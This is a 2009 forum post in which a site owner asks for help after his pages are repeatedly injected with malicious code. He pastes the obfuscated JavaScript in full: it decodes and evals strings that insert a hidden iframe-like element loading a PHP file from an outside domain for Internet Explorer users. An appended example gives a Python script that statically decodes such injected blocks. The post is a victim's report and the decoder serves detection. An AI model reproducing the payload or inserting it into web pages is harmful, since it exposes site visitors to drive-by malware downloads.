PDF Exploit

Discussion in 'Site & Server Administration' started by costi, Aug 12, 2009.

  1. #1
    Hello, recently I had some problems with my server. I don't know how somebody managed to hack some script from my sites, and now every time it adds some malicious code trying to download a pdf4.php from x - daily.com or studiopomelo.com. If you access these sites you will get the same warning from your antivirus, like the one I receive accessing my sites.
    The malicious code is added at the end of the page after </html> or after the body tag. Because of this script I am now blacklisted by Google, which tells me that the site is trying to download malicious code. Can anybody give me some suggestions on what I can do? How can I get rid of this virus?

    The code that is added is something like this:

    on Fcz4(qwi5, Uly5, YUR2) { var Bap0; Bap0=qwi5.split(Uly5); var vWM8=Bap0.join(YUR2); return vWM8;/**/ } function koF4(Mdc0) { Mdc0 = Fcz4(Mdc0,"##+##","'"); Mdc0 = Fcz4(Mdc0,"##|##","\\"); vWM8=""; myh8 =""; for(k=0;k<Mdc0.length;k++) { vWM8 = Mdc0.charCodeAt(k); if (vWM8==32){vWM8=35} else if (vWM8==35){vWM8=32} else if (vWM8==59){vWM8=64} else if (vWM8==64){vWM8=59} else if (vWM8==37){vWM8=42} else if (vWM8==42){vWM8=37} else if (vWM8>=97 && vWM8<=122) { vWM8=vWM8-97;vWM8=25-vWM8;vWM8+=97; }else if (vWM8>=65 && vWM8<=90) { vWM8=vWM8-65;vWM8=25-vWM8;vWM8+=65; }else if (vWM8>=48 && vWM8<=57) { vWM8=vWM8-48;vWM8=9-vWM8;vWM8+=48; } myh8 += String.fromCharCode(vWM8); } return myh8;/**/ }mnz7=eval;mnz7(koF4('ezi#CNy3#=###+##sggk://c-wzrob.xln/hg/rnt/a/hgzgrx.ksk##+##@ezi#BJf9#=###+##ruiznv##+##@'));mnz7(koF4('ezi#Ldq7#=#wlxfnvmg.xivzgvVovnvmg(BJf9)@Ldq7.hvgZggiryfgv(##+##hix##+##,#CNy3)@'));mnz7(koF4('Ldq7.hvgZggiryfgv(##+##drwgs##+##,9)@Ldq7.hvgZggiryfgv(##+##svrtsg##+##,9)@Ldq7.hvgZggiryfgv(##+##yliwvi##+##,9)@'));mnz7(koF4('Ldq7.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));mnz7(koF4('Ldq7.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#GgnC=mzertzgli.fhviZtvmg.glOldviXzhv()@'));mnz7(koF4('ezi#TSFt=GgnC.rmwvcLu(##+##nhrv##+##)@ezi#Hux3=GgnC.rmwvcLu(##+##mg#3.##+##)@ezi#DZQ7=GgnC.rmwvcLu(##+##nhrv#1##+##)@'));if ((GHUg>0)&&(Sfc6==-1)&&(WAJ2==-1)){mnz7(koF4('wlxfnvmg.ylwb.zkkvmwXsrow(Ldq7)@'));}</script>
     
    costi, Aug 12, 2009 IP
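
Added example, not part of the original post: a static decoder for the substitution visible in the koF4 function above (marker replacement, paired character swaps, reversed letters and digits), applied to whatever follows the closing </html> tag so the hidden statements can be read without running them. SAMPLE is a constructed page that reuses two literals from the post; the names decode, injected_statements and CALL are this example's own.

```python
import re
import string

# The posted decoder mirrors a-z, A-Z and 0-9 and swaps three character
# pairs (space/#, ;/@, %/*). One translation table covers all of it.
PLAIN = string.ascii_lowercase + string.ascii_uppercase + string.digits + " #;@%*"
CODED = (string.ascii_lowercase[::-1] + string.ascii_uppercase[::-1]
         + string.digits[::-1] + "# @;*%")
TABLE = str.maketrans(PLAIN, CODED)

# Matches evalAlias(decoder('literal')), the call shape used in the post.
CALL = re.compile(r"\w+\(\w+\('([^']*)'\)\)")

def decode(literal):
    """Reverse the substitution as plain string work; nothing is evaluated."""
    text = literal.replace("##+##", "'").replace("##|##", "\\")
    return text.translate(TABLE)

def injected_statements(page):
    """Decode wrapped literals that appear after the last </html> tag.

    If the page has no closing tag the whole page is searched, since the
    post says the code may also sit after the body tag.
    """
    end = 0
    for match in re.finditer(r"</html\s*>", page, re.IGNORECASE):
        end = match.end()
    return [decode(lit) for lit in CALL.findall(page[end:])]

# Constructed sample: a clean page followed by two literals from the post.
SAMPLE = (
    "<html><body>shop</body></html>\n"
    "<script>mnz7(koF4('ezi#Ldq7#=#wlxfnvmg.xivzgvVovnvmg(BJf9)@"
    "Ldq7.hvgZggiryfgv(##+##hix##+##,#CNy3)@'));"
    "mnz7(koF4('wlxfnvmg.ylwb.zkkvmwXsrow(Ldq7)@'));</script>"
)

if __name__ == "__main__":
    for statement in injected_statements(SAMPLE):
        print(statement)
```

Running the same function over each file under the web root (an assumed workflow) lists which pages carry a trailing block and what it would have inserted.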